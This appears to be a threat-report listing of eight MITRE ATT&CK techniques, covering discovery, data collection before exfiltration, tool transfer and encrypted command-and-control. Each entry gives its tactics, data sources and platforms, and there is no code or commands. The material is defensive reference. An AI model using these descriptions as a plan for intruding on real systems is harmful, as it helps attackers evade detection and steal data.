Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre